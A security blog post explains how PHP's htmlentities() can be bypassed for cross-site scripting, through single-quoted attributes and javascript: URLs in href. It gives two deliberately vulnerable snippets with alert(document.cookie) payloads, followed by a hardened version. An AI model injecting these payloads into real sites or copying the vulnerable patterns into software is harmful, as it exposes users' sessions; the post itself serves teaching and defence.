One way to bypass htmlentities
Hi researchers, it has been a long time since I last published, and that is an excellent sign that I am working a lot!
The life of a bug bounty hunter is hard and we need to study a lot every day.
I am researching the vulnerability-prevention functions in more depth and have found some interesting things that I will gradually share here.
There are a lot of techniques for preventing Cross-Site Scripting, and one of them for PHP is htmlentities().
Many researchers, when faced with this function, give up because they cannot find a way to bypass it, and frustration is inevitable. When user input is printed inside an attribute of an HTML tag, the default configuration of htmlentities() DOES NOT protect you against XSS if single quotes are used to delimit the attribute value: the single quote is left unencoded, so XSS is possible by injecting a single quote that closes the value and starts a new attribute.
Let’s see:
Example01:
<?php
// Simulated attacker-controlled query parameter
$_GET['color'] = "#000000' onload='alert(document.cookie)";
// Default flags: the single quote is not encoded
$body = htmlentities($_GET['color']);
// Single-quoted attribute: the injected quote closes the value and an onload handler is added
print "<body bgcolor='$body'>";
?>

This is insecure code and a bad use of htmlentities().
The ENT_QUOTES option DOES NOT PROTECT against JavaScript evaluation in certain tag attributes, for example the 'href' attribute of the 'a' tag: a javascript: URL contains no characters that htmlentities() encodes, so it is printed unchanged.
Example02:
<?php
// Simulated attacker-controlled query parameter
$_GET['a'] = 'javascript:alert(document.cookie)';
// ENT_QUOTES encodes both quote styles, but nothing in this value needs encoding
$href = htmlentities($_GET['a'], ENT_QUOTES);
// The href still carries a javascript: URL
print "<a href='$href'>link</a>";
?>
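The two sinks above, hardened, as an added example that is not part of the original post: attributes are double-quoted and encoded with ENT_QUOTES, the href scheme is checked against an allowlist because encoding cannot neutralise a javascript: URL, and the colour is validated against its expected shape. The function names are my own and the code assumes PHP 7.4 or later.

```php
<?php
// Added example, not from the original post. Note: PHP 8.1 changed the
// htmlentities() default flags to ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML401;
// on older versions the flags must be passed explicitly, as done here.

// Encode a value for an HTML attribute. Always pair this with a
// double-quoted attribute in the template.
function attr(string $value): string
{
    return htmlentities($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML401, 'UTF-8');
}

// Encoding does not help with Example02: the URL scheme has to be checked.
// Only http, https and relative URLs are allowed; anything else becomes "#".
function safeHref(string $url): string
{
    // Browsers ignore leading whitespace and embedded tab/newline characters
    // when reading the scheme, so strip them before parsing.
    $url = preg_replace('/[\t\r\n]/', '', trim($url));
    $scheme = parse_url($url, PHP_URL_SCHEME);
    if ($scheme === false) {
        return '#'; // unparseable URL
    }
    if ($scheme === null) {
        return attr($url); // relative URL, no scheme
    }
    if (in_array(strtolower($scheme), ['http', 'https'], true)) {
        return attr($url);
    }
    return '#'; // javascript:, data:, vbscript:, ...
}

// For a value with a known shape, an allowlist is stronger than encoding.
function safeColor(string $color): string
{
    return preg_match('/^#[0-9a-fA-F]{6}$/', $color) === 1 ? $color : '#000000';
}

// Constructed inputs: the two payloads from the post.
$color = "#000000' onload='alert(document.cookie)";
$link  = 'javascript:alert(document.cookie)';

echo '<body bgcolor="' . safeColor($color) . '">', "\n";
echo '<body bgcolor="' . attr($color) . '">', "\n";
echo '<a href="' . safeHref($link) . '">link</a>', "\n";
echo '<a href="' . safeHref('https://example.com/?q=a&b=c') . '">link</a>', "\n";
```

With the quote encoded and the attribute double-quoted, the injected onload never leaves the attribute value, and the javascript: link is replaced before it reaches href.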
I am probing other techniques and have found interesting things that I will post here for our research community.
Happy Hacking fellows!
